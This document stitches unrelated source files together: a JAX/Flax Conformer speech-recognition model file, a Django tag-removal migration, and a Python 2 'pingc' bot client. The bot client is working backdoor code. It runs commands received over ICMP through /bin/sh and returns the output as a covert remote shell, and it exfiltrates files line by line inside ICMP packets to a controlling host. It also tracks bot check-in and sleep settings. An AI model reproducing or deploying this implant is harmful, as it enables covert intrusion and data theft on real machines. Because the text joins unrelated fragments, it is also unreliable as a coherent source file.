freq_mask_count: int = 1
freq_mask_max_bins: int = 15
time_mask_count: int = 1
time_mask_max_frames: int = 50
time_mask_max_ratio: float = 1.0
time_masks_per_frame: float = 0.0
use_dynamic_time_mask_max_frames: bool = False
batch_norm_momentum: float = 0.999
batch_norm_epsilon: float = 0.001
enable_conformer_post_layer_norm: bool = False
enable_decoder_pre_layer_norm: bool = False
use_lingvo_attention: bool = False
class LayerNorm(nn.Module):
"""Module implementing layer normalization.
This implementation is same as in this paper:
https://arxiv.org/pdf/1607.06450.pdf.
note: we multiply normalized inputs by (1 + scale) and initialize scale to
zeros, this differs from default flax implementation of multiplying by scale
and initializing to ones.
"""
dim: int = 0
epsilon: float = 1e-6
def setup(self):
self.scale = self.param('scale', nn.initializers.zeros, [self.dim])
self.bias = self.param('bias', nn.initializers.zeros, [self.dim])
@nn.compact
def __call__(self, inputs):
mean = jnp.mean(inputs, axis=[-1], keepdims=True)
var = jnp.mean(jnp.square(inputs - mean), axis=[-1], keepdims=True)
normed_inputs = (inputs - mean) * jax.lax.rsqrt(var + self.epsilon)
normed_inputs *= (1 + self.scale)
normed_inputs += self.bias
return normed_inputs
class Subsample(nn.Module):
"""Module to perform strided convolution in order to subsample inputs.
Attributes:
encoder_dim: model dimension of conformer.
input_dropout_rate: dropout rate for inputs.
"""
encoder_dim: int = 0
input_dropout_rate: float = 0.0
@nn.compact
def __call__(self, inputs, input_paddings, train):
output_paddings = input_paddings
outputs = jnp.expand_dims(inputs, axis=-1)
outputs, output_paddings = Conv2dSubsampling(
input_channels=1, output_channels=self.encoder_dim)(outputs,
output_paddings)
outputs, output_paddings = Conv2dSubsampling(
input_channels=self.encoder_dim,
output_channels=self.encoder_dim)(outputs, output_paddings)
batch_size, subsampled_lengths, subsampled_dims, channels = outputs.shape
outputs = jnp.reshape(
outputs, (batch_size, subsampled_lengths, subsampled_dims * channels))
outputs = nn.Dense(
self.encoder_dim,
use_bias=True,
kernel_init=nn.initializers.xavier_uniform())(outputs)
outputs = outputs + AddPositionalEmbedding(embedding_dim=self.encoder_dim)(
seq_length=outputs.shape[1])
outputs = nn.Dropout(
rate=self.input_dropout_rate, deterministic=not train)(
outputs)
return outputs, output_paddings
class Conv2dSubsampling(nn.Module):
"""Helper module used in Subsample layer.
1) Performs strided convolution over inputs and then applies non-linearity.
2) Also performs strided convolution over input_paddings to return the correct
paddings for downstream layers.
"""
input_channels: int = 0
output_channels: int = 0
filter_stride: List[int] = (2, 2)
padding: str = 'SAME'
def setup(self):
self.filter_shape = (3, 3, self.input_channels, self.output_channels)
self.kernel = self.param('kernel', nn.initializers.xavier_uniform(),
self.filter_shape)
self.bias = self.param('bias', lambda rng, s: jnp.zeros(s, jnp.float32),
self.output_channels)
@nn.compact
def __call__(self, inputs, paddings):
# Computing strided convolution to subsample inputs.
feature_group_count = inputs.shape[3] // self.filter_shape[2]
outputs = jax.lax.conv_general_dilated(
lhs=inputs,
rhs=self.kernel,
window_strides=self.filter_stride,
padding=self.padding,
rhs_dilation=(1, 1),
dimension_numbers=('NHWC', 'HWIO', 'NHWC'),
feature_group_count=feature_group_count)
outputs += jnp.reshape(self.bias, (1,) * (outputs.ndim - 1) + (-1,))
outputs = nn.relu(outputs)
# Computing correct paddings post input convolution.
input_length = paddings.shape[1]
stride = self.filter_stride[0]
pad_len = (input_length + stride - 1) // stride * stride - input_length
out_padding = jax.lax.conv_general_dilated(
lhs=paddings[:, :, None],
rhs=jnp.ones([1, 1, 1]),
window_strides=self.filter_stride[:1],
padding=[(0, pad_len)],
dimension_numbers=('NHC', 'HIO', 'NHC'))
out_padding = jnp.squeeze(out_padding, axis=-1)
# Mask outputs by correct paddings to ensure padded elements in inputs map
# to padded value in outputs.
outputs = outputs * (1.0 -
jnp.expand_dims(jnp.expand_dims(out_padding, -1), -1))
return outputs, out_padding
class FeedForwardModule(nn.Module):
"""Feedforward block of conformer layer.
"""
config: ConformerConfig
@nn.compact
def __call__(self, inputs, padding_mask=None, train=False):
config = self.config
inputs = LayerNorm(dim=config.encoder_dim)(inputs)
inputs = nn.Dense(
config.encoder_dim * config.feed_forward_expansion_factor,
use_bias=True,
kernel_init=nn.initializers.xavier_uniform())(
inputs)
inputs = nn.swish(inputs)
inputs = nn.Dropout(rate=config.feed_forward_dropout_rate)(
inputs, deterministic=not train)
inputs = inputs * padding_mask
inputs = nn.Dense(
config.encoder_dim,
use_bias=True,
kernel_init=nn.initializers.xavier_uniform())(
inputs)
inputs = inputs * padding_mask
inputs = nn.Dropout(rate=config.feed_forward_residual_dropout_rate)(
inputs, deterministic=not train)
return inputs
class AddPositionalEmbedding(nn.Module):
"""Adds (optionally learned) positional embeddings to the inputs.
Attributes:
max_len: maximum possible length for the input
posemb_init: positional embedding initializer
"""
min_timescale: int = 1
max_timescale: int = 10_000
embedding_dim: int = 512
@nn.compact
def __call__(self, seq_length):
position = jnp.arange(seq_length, dtype=jnp.float32)[jnp.newaxis, :]
num_timescales = self.embedding_dim // 2
log_timescale_increment = (
math.log(float(self.max_timescale) / float(self.min_timescale)) /
jnp.maximum(jnp.asarray(num_timescales, dtype=jnp.float32) - 1, 1))
inv_timescales = self.min_timescale * jnp.exp(
jnp.arange(num_timescales, dtype=jnp.float32) *
-log_timescale_increment)
scaled_time = (
position[:, :, jnp.newaxis] *
inv_timescales[jnp.newaxis, jnp.newaxis, :])
signal = jnp.concatenate(
[jnp.sin(scaled_time), jnp.cos(scaled_time)],
axis=2).astype(jnp.float32)
# Force usage of `np` rather than `jnp` to compute static values at trace
# time.
signal = jnp.pad(signal,
[[0, 0], [0, 0], [0, np.mod(self.embedding_dim, 2)]])
return signal
# Adapted from lingvo attention layer for query scaling
# https://github.com/tensorflow/lingvo/blob/7de4ca8fff3cb28c2ecb21bbd7b02a964ce727f7/lingvo/jax/layers/attentions.py#L201
class QueryScaler(nn.Module):
"""A layer to scale individual dims of the query attention matrix."""
dim: int = 0
def setup(self):
self.scale = self.param('scale', nn.initializers.zeros, [self.dim])
@nn.compact
def __call__(self, inputs):
inputs_shape = inputs.shape
if inputs_shape[-1] != self.dim:
raise ValueError('QueryScaler expects inputs to have'
' same last dimension as scaling param.')
# 1.0/jax.nn.softplus(0.0) = 1.442695041. Hard code this number so that we
# can avoid unnecessary XLA op fusion mess on TPU.
r_softplus_0 = 1.442695041
scale = jnp.array(r_softplus_0, dtype=inputs.dtype)
scale *= jax.nn.softplus(self.scale)
return inputs * scale
# Modifying flax linen default dot product attention function to add
# query scaling, reference to original function here :
# https://github.com/google/flax/blob/a9af38085a7a49b571cf37d375060fd683e74972/flax/linen/attention.py#L121
def dot_product_attention(query,
key,
value,
bias=None,
mask=None,
broadcast_dropout=True,
dropout_rng=None,
dropout_rate=0.,
deterministic=False,
dtype=jnp.float32,
precision=None):
"""Computes dot-product attention given query, key, and value.
This is the core function for applying attention based on
https://arxiv.org/abs/1706.03762. It's slightly modified to add query scaling.
It calculates the attention weights given query and key and combines the
values using the attention weights.
Note: query, key, value needn't have any batch dimensions.
Args:
query: queries for calculating attention with shape of
`[batch..., q_length, num_heads, qk_depth_per_head]`.
key: keys for calculating attention with shape of
`[batch..., kv_length, num_heads, qk_depth_per_head]`.
value: values to be used in attention with shape of
`[batch..., kv_length, num_heads, v_depth_per_head]`.
bias: bias for the attention weights. This should be broadcastable to the
shape `[batch..., num_heads, q_length, kv_length]`.
This can be used for incorporating causal masks, padding masks,
proximity bias, etc.
mask: mask for the attention weights. This should be broadcastable to the
shape `[batch..., num_heads, q_length, kv_length]`.
This can be used for incorporating causal masks.
Attention weights are masked out if their corresponding mask value
is `False`.
broadcast_dropout: bool: use a broadcasted dropout along batch dims.
dropout_rng: JAX PRNGKey: to be used for dropout
dropout_rate: dropout rate
deterministic: bool, deterministic or not (to apply dropout)
dtype: the dtype of the computation (default: float32)
precision: numerical precision of the computation see `jax.lax.Precision`
for details.
Returns:
Output of shape `[batch..., q_length, num_heads, v_depth_per_head]`.
"""
assert key.ndim == query.ndim == value.ndim, 'q, k, v must have same rank.'
assert query.shape[:-3] == key.shape[:-3] == value.shape[:-3], (
'q, k, v batch dims must match.')
assert query.shape[-2] == key.shape[-2] == value.shape[-2], (
'q, k, v num_heads must match.')
assert key.shape[-3] == value.shape[-3], 'k, v lengths must match.'
# compute attention weights
query = QueryScaler(dim=query.shape[-1])(query)
attn_weights = nn.dot_product_attention_weights(query, key, bias, mask,
broadcast_dropout,
dropout_rng, dropout_rate,
deterministic, dtype,
precision)
# return weighted sum over values for each query position
return jnp.einsum('...hqk,...khd->...qhd', attn_weights, value,
precision=precision)
class MultiHeadedSelfAttention(nn.Module):
"""Self attention sub-layer used in the Conformer layer.
Input is first normalized using layer norm. Output is processed using
multi-headed attention.
Note: this attention implementation uses a learned scale parameter to scale
query matrix before passing it to flax attention module.
"""
config: ConformerConfig = None
def setup(self):
dim_per_head = self.config.encoder_dim // self.config.num_attention_heads
self.self_attention = lingvo_attention.DotProductAttention(
num_heads=self.config.num_attention_heads,
hidden_dim=self.config.encoder_dim,
input_dim=self.config.encoder_dim,
dim_per_head=dim_per_head)
def _get_large_negative_number(self, dtype):
if jnp.issubdtype(dtype, jnp.inexact):
dtype_max = jnp.finfo(dtype).max
elif jnp.issubdtype(dtype, jnp.integer):
dtype_max = jnp.iinfo(dtype).max
else:
raise ValueError('Unsupported dtype for inputs.')
return jnp.asarray(-0.7 * dtype_max, dtype=dtype)
def convert_paddings_to_mask(self, paddings, dtype=jnp.float32):
attention_mask = paddings[:, jnp.newaxis, jnp.newaxis, :]
attention_mask *= self._get_large_negative_number(dtype)
return attention_mask
@nn.compact
def __call__(self, inputs, paddings, train):
config = self.config
mask_paddings = 1 - paddings
attention_mask = nn.make_attention_mask(
mask_paddings > 0, mask_paddings > 0, dtype=jnp.float32)
inputs = LayerNorm(dim=config.encoder_dim)(inputs)
if self.config.use_lingvo_attention:
atten_mask = self.convert_paddings_to_mask(paddings, inputs.dtype)
result = self.self_attention(
query_vec=inputs,
key_vec=inputs,
value_vec=inputs,
atten_mask=atten_mask)[0]
else:
result = nn.SelfAttention(
num_heads=config.num_attention_heads,
qkv_features=config.encoder_dim,
decode=False,
dtype=config.dtype,
kernel_init=nn.initializers.xavier_uniform(),
bias_init=nn.initializers.zeros,
use_bias=True,
broadcast_dropout=False,
attention_fn=dot_product_attention,
dropout_rate=config.attention_dropout_rate,
deterministic=not train)(inputs, attention_mask)
result = nn.Dropout(
rate=config.attention_residual_dropout_rate, deterministic=not train)(
result)
return result
class BatchNorm(nn.Module):
"""Implements batch norm respecting input paddings.
This implementation takes into account input padding by masking inputs before
computing mean and variance.
This is inspired by lingvo jax implementation of BatchNorm:
https://github.com/tensorflow/lingvo/blob/84b85514d7ad3652bc9720cb45acfab08604519b/lingvo/jax/layers/normalizations.py#L92
and the corresponding defaults for momentum and epsilon have been copied over
from lingvo.
"""
config: ConformerConfig
def setup(self):
dim = self.config.encoder_dim
dtype = self.config.dtype
self.ra_mean = self.variable('batch_stats', 'mean',
lambda s: jnp.zeros(s, dtype), dim)
self.ra_var = self.variable('batch_stats', 'var',
lambda s: jnp.ones(s, dtype), dim)
self.gamma = self.param('scale', nn.initializers.zeros, dim, dtype)
self.beta = self.param('bias', nn.initializers.zeros, dim, dtype)
@nn.compact
def __call__(self, inputs, input_paddings, train):
rank = inputs.ndim
reduce_over_dims = list(range(0, rank - 1))
padding = jnp.expand_dims(input_paddings, -1)
momentum = self.config.batch_norm_momentum
epsilon = self.config.batch_norm_epsilon
if train:
mask = 1.0 - padding
sum_v = jnp.sum(inputs * mask, axis=reduce_over_dims, keepdims=True)
count_v = jnp.sum(
jnp.ones_like(inputs) * mask, axis=reduce_over_dims, keepdims=True)
count_v = jnp.maximum(count_v, 1.0)
mean = sum_v / count_v
sum_vv = jnp.sum(
(inputs - mean) * (inputs - mean) * mask,
axis=reduce_over_dims,
keepdims=True)
var = sum_vv / count_v
self.ra_mean.value = momentum * self.ra_mean.value + (
1 - momentum) * mean
self.ra_var.value = momentum * self.ra_var.value + (
1 - momentum) * var
else:
mean = self.ra_mean.value
var = self.ra_var.value
inv = (1 + self.gamma) / jnp.sqrt(var + epsilon)
bn_output = (inputs - mean) * inv + self.beta
bn_output *= 1.0 - padding
return bn_output
class ConvolutionBlock(nn.Module):
r"""Convolution block in conformer layer.
architecture:
input # (batch, time, hidden_dim)
|
layer_norm(.) # (batch, time, hidden_dim)
dense(.), dense(.) # (batch, time, 2 * hidden_dim)
| /
glu(.) # (batch, time, hidden_dim)
depthwise_conv1d(.)
batch_norm(.)
act(.)
|
dense(.)
dropout(.)
|
output
"""
config: ConformerConfig
@nn.compact
def __call__(self, inputs, input_paddings, train):
config = self.config
inputs = LayerNorm(dim=config.encoder_dim)(inputs)
input_gated1 = nn.Dense(
config.encoder_dim,
kernel_init=nn.initializers.xavier_uniform(),
use_bias=True)(inputs)
input_gated2 = nn.Dense(
config.encoder_dim,
kernel_init=nn.initializers.xavier_uniform(),
use_bias=True)(inputs)
inputs = input_gated1 * jax.nn.sigmoid(input_gated2)
inputs = inputs * (1 - jnp.expand_dims(input_paddings, -1))
inputs = nn.Conv(
features=config.encoder_dim,
kernel_size=(config.convolution_kernel_size,),
strides=(1,),
padding='SAME',
feature_group_count=config.encoder_dim,
use_bias=False,
kernel_init=nn.initializers.xavier_uniform())(inputs)
inputs = BatchNorm(config)(inputs, input_paddings, train)
inputs = nn.swish(inputs)
inputs = nn.Dense(
config.encoder_dim,
kernel_init=nn.initializers.xavier_uniform())(inputs)
inputs = nn.Dropout(
rate=config.conv_residual_dropout_rate, deterministic=not train)(inputs)
return inputs
class ConformerBlock(nn.Module):
"""Implements a single conformer encoder layer.
High level overview:
x = x + 0.5 * FeedForward(x)
x = x + MHSA(x)
x = x + ConvolutionBlock(x)
x = x + 0.5 * FeedForward(x)
y = layer_norm(x)
"""
config: ConformerConfig
@nn.compact
def __call__(self, inputs, input_paddings, train):
config = self.config
padding_mask = jnp.expand_dims(1 - input_paddings, -1)
inputs = inputs + 0.5 * FeedForwardModule(config=self.config)(
inputs, padding_mask, train)
inputs = inputs + MultiHeadedSelfAttention(config=self.config)(
inputs, input_paddings, train)
inputs = inputs + ConvolutionBlock(config)(inputs, input_paddings, train)
inputs = inputs + 0.5 * FeedForwardModule(config=self.config)(
inputs, padding_mask, train)
if config.enable_conformer_post_layer_norm:
inputs = LayerNorm(dim=config.encoder_dim)(inputs)
return inputs
class ConformerEncoderDecoder(nn.Module):
"""Conformer (encoder + decoder) block.
Takes audio input signals and outputs probability distribution over vocab size
for each time step. The output is then fed into a CTC loss which eliminates
the need for alignment with targets.
"""
config: ConformerConfig
def setup(self):
config = self.config
self.specaug = spectrum_augmenter.SpecAug(
freq_mask_count=config.freq_mask_count,
freq_mask_max_bins=config.freq_mask_max_bins,
time_mask_count=config.time_mask_count,
time_mask_max_frames=config.time_mask_max_frames,
time_mask_max_ratio=config.time_mask_max_ratio,
time_masks_per_frame=config.time_masks_per_frame,
use_dynamic_time_mask_max_frames=config
.use_dynamic_time_mask_max_frames)
@nn.compact
def __call__(self, inputs, input_paddings, train):
config = self.config
outputs = inputs
output_paddings = input_paddings
# Compute normalized log mel spectrograms from input audio signal.
preprocessing_config = preprocessor.LibrispeechPreprocessingConfig()
outputs, output_paddings = preprocessor.MelFilterbankFrontend(
preprocessing_config,
per_bin_mean=preprocessor.LIBRISPEECH_MEAN_VECTOR,
per_bin_stddev=preprocessor.LIBRISPEECH_STD_VECTOR)(
outputs, output_paddings)
# Ablate random parts of input along temporal and frequency dimension
# following the specaug procedure in https://arxiv.org/abs/1904.08779.
if config.use_specaug and train:
outputs, output_paddings = self.specaug(outputs, output_paddings)
# Subsample input by a factor of 4 by performing strided convolutions.
outputs, output_paddings = Subsample(
encoder_dim=config.encoder_dim,
input_dropout_rate=config.input_dropout_rate)(outputs, output_paddings,
train)
# Run the conformer encoder layers.
for _ in range(config.num_encoder_layers):
outputs = ConformerBlock(config)(outputs, output_paddings, train)
if config.enable_decoder_pre_layer_norm:
outputs = LayerNorm(config.encoder_dim)(outputs)
# Run the decoder which in this case is a trivial projection layer.
outputs = nn.Dense(
config.vocab_size,
use_bias=True,
kernel_init=nn.initializers.xavier_uniform())(outputs)
return outputs, output_paddings
class ConformerModel(base_model.BaseModel):
"""Conformer model that takes in log mel spectrograms as inputs.
outputs probability distribution over vocab size for each time step.
"""
# Adapted from lingvo's greedy decoding logic here:
# https://github.com/tensorflow/lingvo/blob/2ee26814c57b7dcead3f0382170f2f3da006f810/lingvo/jax/layers/ctc_objectives.py#L138
def sequence_mask(self, lengths, maxlen):
batch_size = lengths.shape[0]
a = jnp.ones([batch_size, maxlen])
b = jnp.cumsum(a, axis=-1)
c = jnp.less_equal(b, lengths[:, jnp.newaxis]).astype(lengths.dtype)
return c
def compute_loss(self, logits, logit_paddings, labels, label_paddings):
logprobs = nn.log_softmax(logits)
per_seq_loss = self.loss_fn(logprobs, logit_paddings, labels,
label_paddings)
normalizer = jnp.sum(1 - label_paddings)
normalized_loss = jnp.sum(per_seq_loss) / jnp.maximum(normalizer, 1)
return normalized_loss
def collapse_and_remove_blanks(self, labels, seq_length, blank_id: int = 0):
b, t = labels.shape
# Zap out blank
blank_mask = 1 - jnp.equal(labels, blank_id)
labels = (labels * blank_mask).astype(labels.dtype)
# Mask labels that don't equal previous label.
label_mask = jnp.concatenate([
jnp.ones_like(labels[:, :1], dtype=jnp.int32),
jnp.not_equal(labels[:, 1:], labels[:, :-1])
], axis=1)
# Filter labels that aren't in the original sequence.
maxlen = labels.shape[1]
seq_mask = self.sequence_mask(seq_length, maxlen=maxlen)
label_mask = label_mask * seq_mask
# remove repetitions from the labels
ulabels = label_mask * labels
# Count masks for new sequence lengths.
label_mask = jnp.not_equal(ulabels, 0).astype(labels.dtype)
new_seq_len = jnp.sum(label_mask, axis=1)
# Mask indexes based on sequence length mask.
new_maxlen = maxlen
idx_mask = self.sequence_mask(new_seq_len, maxlen=new_maxlen)
# Flatten everything and mask out labels to keep and sparse indices.
flat_labels = jnp.reshape(ulabels, [-1])
flat_idx_mask = jnp.reshape(idx_mask, [-1])
indices = jnp.nonzero(flat_idx_mask, size=b * t)[0]
values = jnp.nonzero(flat_labels, size=b * t)[0]
updates = jnp.take_along_axis(flat_labels, values, axis=-1)
# Scatter to flat shape.
flat = jnp.zeros(flat_idx_mask.shape).astype(labels.dtype)
flat = flat.at[indices].set(updates)
# 0'th position in the flat array gets clobbered by later padded updates,
# so reset it here to its original value
flat = flat.at[0].set(updates[0])
# Reshape back to square batch.
batch_size = labels.shape[0]
new_shape = [batch_size, new_maxlen]
return (jnp.reshape(flat, new_shape).astype(labels.dtype),
new_seq_len.astype(seq_length.dtype))
def greedy_decode(self, logits, logit_paddings):
per_frame_max = jnp.argmax(logits, axis=-1)
seqlen = jnp.sum(1.0 - logit_paddings, axis=-1)
hyp, _ = self.collapse_and_remove_blanks(per_frame_max, seqlen, blank_id=0)
hyp_paddings = jnp.equal(hyp, 0).astype(jnp.int32)
return hyp, hyp_paddings
def evaluate_batch(self, params, batch_stats, batch):
"""Evaluates cross_entopy on the given batch."""
logits, logit_paddings = self.flax_module.apply(
{
'params': params,
'batch_stats': batch_stats
},
batch['inputs'],
batch['input_paddings'],
train=False,
mutable=False)
labels = batch['targets']
label_paddings = batch['target_paddings']
normalized_loss = self.compute_loss(logits, logit_paddings, labels,
label_paddings)
hyps, hyp_paddings = self.greedy_decode(logits, logit_paddings)
return self.metrics_bundle.gather_from_model_output(
normalized_loss=normalized_loss,
hyps=hyps,
hyp_paddings=hyp_paddings,
targets=labels,
target_paddings=label_paddings,
axis_name='batch')
def training_cost(self, params, batch, batch_stats=None, dropout_rng=None):
"""Return CTC loss."""
# For more information on flax.linen.Module.apply, see the docs at
# https://flax.readthedocs.io/en/latest/flax.linen.html#flax.linen.Module.apply.
(outputs, output_paddings), new_batch_stats = self.flax_module.apply(
{
'params': params,
'batch_stats': batch_stats
},
batch['inputs'],
batch['input_paddings'],
rngs={'dropout': dropout_rng},
mutable=['batch_stats'],
train=True)
labels = batch['targets']
label_paddings = batch['target_paddings']
normalized_loss = self.compute_loss(outputs, output_paddings, labels,
label_paddings)
return normalized_loss, new_batch_stats
def apply_on_batch(self, params, batch_stats, batch, **apply_kwargs):
"""Wrapper around flax_module.apply."""
if batch_stats is not None:
variables = {'params': params, 'batch_stats': batch_stats}
else:
variables = {'params': params}
return self.flax_module.apply(
variables,
batch['inputs'],
batch['input_paddings'],
**apply_kwargs)
def build_flax_module(self):
config = ConformerConfig(
vocab_size=self.hps.output_shape[1],
encoder_dim=self.hps.encoder_dim,
num_attention_heads=self.hps.num_attention_heads,
num_encoder_layers=self.hps.num_encoder_layers,
convolution_kernel_size=self.hps.convolution_kernel_size,
freq_mask_count=self.hps.freq_mask_count,
freq_mask_max_bins=self.hps.freq_mask_max_bins,
time_mask_count=self.hps.time_mask_count,
time_mask_max_frames=self.hps.time_mask_max_frames,
time_mask_max_ratio=self.hps.time_mask_max_ratio,
time_masks_per_frame=self.hps.time_masks_per_frame,
use_dynamic_time_mask_max_frames=self.hps
.use_dynamic_time_mask_max_frames,
use_specaug=self.hps.use_specaug,
attention_residual_dropout_rate=self.hps.residual_dropout_rate,
feed_forward_residual_dropout_rate=self.hps.residual_dropout_rate,
input_dropout_rate=self.hps.input_dropout_rate,
enable_conformer_post_layer_norm=self.hps
.enable_conformer_post_layer_norm,
enable_decoder_pre_layer_norm=self.hps.enable_decoder_pre_layer_norm,
use_lingvo_attention=self.hps.use_lingvo_attention)
module = ConformerEncoderDecoder(config)
return module
def get_fake_inputs(self, hps):
"""Helper method solely for purpose of initalizing the model."""
dummy_inputs = [
jnp.zeros((hps.batch_size, *x), dtype=hps.model_dtype)
for x in hps.input_shape
]
return dummy_inputs
| {
"content_hash": "3130d0577c92be8f18e6eebebb8b5e8c",
"timestamp": "",
"source": "github",
"line_count": 875,
"max_line_length": 127,
"avg_line_length": 34.753142857142855,
"alnum_prop": 0.6491499227202473,
"repo_name": "google/init2winit",
"id": "3898807fb153c3ca8e453793d19f42d6169a1297",
"size": "31012",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "init2winit/model_lib/conformer.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1560124"
}
],
"symlink_target": ""
} |
from django.db import migrations
def drop_dynamic_theme_tag(apps, schema_editor):
Tag = apps.get_model('tags', 'Tag')
Tag.objects.filter(tag_text='dynamic theme').delete()
class Migration(migrations.Migration):
dependencies = [
('tags', '0002_auto_20210713_1131'),
]
operations = [
migrations.RunPython(drop_dynamic_theme_tag)
]
| {
"content_hash": "fcea428846fba9151a85e37a627f028c",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 57,
"avg_line_length": 22.058823529411764,
"alnum_prop": 0.656,
"repo_name": "wagnerand/addons-server",
"id": "9bf03ea2207f1a3281c3086baac39e36f3c2f5b1",
"size": "424",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "src/olympia/tags/migrations/0003_auto_20210721_1146.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "245987"
},
{
"name": "Dockerfile",
"bytes": "3900"
},
{
"name": "HTML",
"bytes": "290334"
},
{
"name": "JavaScript",
"bytes": "749163"
},
{
"name": "Less",
"bytes": "211386"
},
{
"name": "Makefile",
"bytes": "564"
},
{
"name": "Python",
"bytes": "6780019"
},
{
"name": "Shell",
"bytes": "8638"
},
{
"name": "Smarty",
"bytes": "1261"
}
],
"symlink_target": ""
} |
import fileinput
import sys
from datetime import date
import time
import signal
import subprocess as sub
from ConfigParser import SafeConfigParser
from optparse import OptionParser
import argparse
from scapy.all import *
import select
from impacket import ImpactDecoder
from impacket import ImpactPacket
def printLine(line,flag):
logfile = file('log/pingc.log', 'a')
if int(flag) == 2:
logfile.write(line + '\n')
print line
if int(flag) == 1:
logfile.write(line + '\n')
if not '[D]' in str(line):
print line
else:
logfile.write(line + '\n')
return
def pingshell(dst):
printLine( "[D] Dst: %s" % (dst),flag)
s=socket.socket(socket.AF_INET,socket.SOCK_RAW,socket.IPPROTO_ICMP)
s.setblocking(0)
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
printLine( "[*] Socket created",flag)
ip = ImpactPacket.IP()
ip.set_ip_dst(dst)
# Create a new ICMP packet of type ECHO
icmp = ImpactPacket.ICMP()
icmp.set_icmp_type(icmp.ICMP_ECHO)
response = "#"
printLine( "[D] Response: %s" % (response), flag)
# Include the command as data inside the ICMP packet
icmp.contains(ImpactPacket.Data(response))
# Calculate its checksum
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
# Have the IP packet contain the ICMP packet (along with its payload)
ip.contains(icmp)
# Send it to the target host
s.sendto(ip.get_packet(), (dst, 0))
decoder = ImpactDecoder.IPDecoder()
cmd = ''
count = 0
while 1:
# Wait for incoming replies
if s in select.select([ s ], [], [], 15)[0]:
printLine("[*] Packet received from %s" % (dst),flag)
buff = s.recv(4096)
if 0 == len(buff):
# Socket remotely closed
s.close()
return
# Packet received; decode and display it
ippacket = decoder.decode(buff)
icmppacket = ippacket.child()
# If the packet matches, report it to the user
# Get identifier and sequence number
data = icmppacket.get_data_as_string()
if len(data) > 0:
if data != '\n':
printLine("[D] Data: %s" % (str(data)),flag)
if data.split('\n')[0] == 'exit':
s.close()
return
# Parse command from standard input
try:
shell_proc=sub.Popen(["/bin/sh", "-i"],shell=True,stdin=sub.PIPE,stdout=sub.PIPE,stderr=sub.PIPE)
except Exception, e:
printLine("[X] ERROR: %s" % (str(e)),flag)
try:
response = shell_proc.communicate(data)[0]
printLine("[D] Response: %s" % (response),flag)
except Exception,e:
printLine( "[X] Error reading response",flag)
response = 'error\n'
response = response + '#'
printLine("[D] Response: %s" % (response),flag)
else:
response = '#'
if len(response) > 1432:
chunks, chunk_size = len(response), len(response)/1432
printLine( "[D] Chunks: %s, chunk_size: %s" % (chunks, chunk_size),flag)
for i in range(0, chunks, chunk_size):
printLine( "[D] Response[%s]: %s" % (i,str(response[i:i+chunk_size])),flag)
# Include the command as data inside the ICMP packet
icmp.contains(ImpactPacket.Data(str(response[i:i+chunk_size])))
# Calculate its checksum
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
# Have the IP packet contain the ICMP packet (along with its payload)
ip.contains(icmp)
# Send it to the target host
s.sendto(ip.get_packet(), (dst, 0))
printLine( "[D] Packet sent: %s" % (response),flag)
else:
# Include the command as data inside the ICMP packet
icmp.contains(ImpactPacket.Data(response))
# Calculate its checksum
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
# Have the IP packet contain the ICMP packet (along with its payload)
ip.contains(icmp)
# Send it to the target host
s.sendto(ip.get_packet(), (dst, 0))
printLine( "[D] Packet sent: %s" % (response),flag)
else:
printLine( "[*] Select timeout hit, resending empty prompt",flag)
count = count + 1
if count == 9:
printLine("[X] Session lost, disconnecting",flag)
return
ip = ImpactPacket.IP()
ip.set_ip_dst(dst)
# Create a new ICMP packet of type ECHO
icmp = ImpactPacket.ICMP()
icmp.set_icmp_type(icmp.ICMP_ECHO)
prompt = '#'
# Include the command as data inside the ICMP packet
icmp.contains(ImpactPacket.Data(prompt))
# Calculate its checksum
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
# Have the IP packet contain the ICMP packet (along with its payload)
ip.contains(icmp)
# Send it to the target host
s.sendto(ip.get_packet(), (dst, 0))
printLine( "[*] Socket closed and returning",flag)
def getSleep():
conf_file = 'conf/pingc.conf'
cp = SafeConfigParser()
cp.optionxform = str # Preserves case sensitivity
cp.readfp(open(conf_file, 'r'))
section = 'Main'
sleep = cp.get(section,'sleep')
printLine( "[*] Sleeping for %s seconds" % (sleep),flag)
time.sleep(int(sleep))
return
def setSleep(sleep):
conf_file = 'conf/pingc.conf'
cp = SafeConfigParser()
cp.optionxform = str # Preserves case sensitivity
cp.readfp(open(conf_file, 'r'))
section = 'Main'
options = {'sleep': sleep}
for option, value in options.items():
cp.set(section, option, value)
cp.write(open(conf_file, 'w'))
def getId():
conf_file = 'conf/pingc.conf'
printLine( "[D] Getting bot Id",flag)
cp = SafeConfigParser()
cp.optionxform = str # Preserves case sensitivity
cp.readfp(open(conf_file, 'r'))
section = 'Main'
id = cp.get(section,'id')
printLine( "[D] ID found: %s" % (id),flag)
return id
def setId(botId):
conf_file = 'conf/pingc.conf'
print "[D] Writing bot Id: ",botId
cp = SafeConfigParser()
cp.optionxform = str # Preserves case sensitivity
cp.readfp(open(conf_file, 'r'))
section = 'Main'
options = {'checkedin': '1',
'id': botId}
for option, value in options.items():
cp.set(section, option, value)
cp.write(open(conf_file, 'w'))
def active():
conf_file = 'conf/pingc.conf'
cp = SafeConfigParser()
cp.optionxform = str # Preserves case sensitivity
cp.readfp(open(conf_file, 'r'))
section = 'Main'
printLine("[D] checking pingc.conf for checkedin",flag)
return cp.get(section,'checkedin')
def handler(signum, frame):
print 'Bye!'
sys.exit()
def sendFile(dest,filename,botId):
printLine( "[*] Sending file: %s" % (filename),flag)
try:
file = open(filename, 'r')
except Exception, e:
printLine( "[X] File error: %s" % (str(e)),flag)
return
startLine = '(FILE_START) ' + botId + ' ' + str(filename)
printLine("[D] Startline: %s" % (startLine),flag)
packet=IP(dst=dest)/ICMP()/startLine
p=sr1(packet,timeout=1)
for line in file:
printLine( "[D] Sending line: %s" % (line),flag)
sendLine = '(FILE) ' + botId + ' ' + filename + ' ' + line
packet=IP(dst=dest)/ICMP()/sendLine
#send(packet)
#time.sleep(1)
p=sr1(packet,timeout=1)
printLine( "[D] End of file",flag)
